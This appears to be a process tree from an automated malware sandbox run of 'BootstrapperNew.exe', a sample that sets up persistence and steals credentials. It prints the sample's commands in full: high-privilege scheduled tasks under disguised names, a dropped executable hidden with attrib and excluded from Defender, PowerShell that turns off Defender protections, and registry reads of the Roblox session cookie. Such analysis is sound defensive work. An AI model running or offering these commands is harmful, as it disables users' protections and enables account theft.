- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,10975132020996442623,13629958872490912730,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3564 /prefetch:2
  2⤵
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  PID:4804

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:224

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4796

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2028

C:\Users\Admin\Downloads\BootstrapperNew.exe
"C:\Users\Admin\Downloads\BootstrapperNew.exe"
1⤵
- Modifies WinLogon for persistence
- Checks computer location settings
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Drops file in Program Files directory
- Drops file in Windows directory
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:5100
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Microsoft Access Update" /tr "C:\Program Files\xdwdWireshark Host.exe" & exit
  2⤵
  PID:3096
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Microsoft Access Update" /tr "C:\Program Files\xdwdWireshark Host.exe"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2784
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:3248
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:3204
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Microsoft Edge Host" /tr "C:\Users\Public\Pictures\xdwdNode.js.exe" /RL HIGHEST & exit
  2⤵
  PID:976
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo 5 /tn "Microsoft Edge Host" /tr "C:\Users\Public\Pictures\xdwdNode.js.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:1220
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:2480
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:1580
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:4868
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:2028
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:1816
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:2744
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:4340
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:2640
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:2720
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:4044
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:3676
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:892
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:2360
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:1128
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:4500
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:2016
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:1036
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:2360
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:3556
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:2748
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:2380
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:1652
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:4740
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:4868
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:1016
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:1824
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:2968
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:2828
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:2348
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:1052
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:2980
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2616
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:5000
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:4820
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:4316
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:2140
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:4212
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:1260
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:3440
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:952
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:3852
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:1136
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:2016
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:3204
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:4236
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:1016
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:4608
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:3812
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:3252
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:3556
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:1052
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:2016
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:2656
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:1840
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:1652
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:1520
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:2560
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:4992
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:2376
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:1156
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:5084
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2008
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:1932
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:3516
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:1656
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:1728
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:4500
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:1580
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:1704
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:1124
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:2268
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:412
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:4960
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2324
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:3256
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:924
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:1992
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:4248
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:1840
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:4384
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:1036
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:884
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:656
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:2848
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:1220
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:3272
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:1016
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:3364
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:1988
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:3344
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:976
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:3332
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:3140
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:1688
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:4356
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:3624
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:724
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:924
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:3112
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:1464
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:2440
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:3736
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\tjktyptw.kq5.exe"' & exit
  2⤵
  PID:4952
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\tjktyptw.kq5.exe"'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:436
  - - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\tjktyptw.kq5.exe
      "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\tjktyptw.kq5.exe"
      4⤵
      Drops file in Drivers directory
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of AdjustPrivilegeToken
      PID:1816
    - - C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\tjktyptw.kq5.exe"
        5⤵
        Views/modifies file attributes
        
        PID:1252
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\tjktyptw.kq5.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:2176
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2432
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1124
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
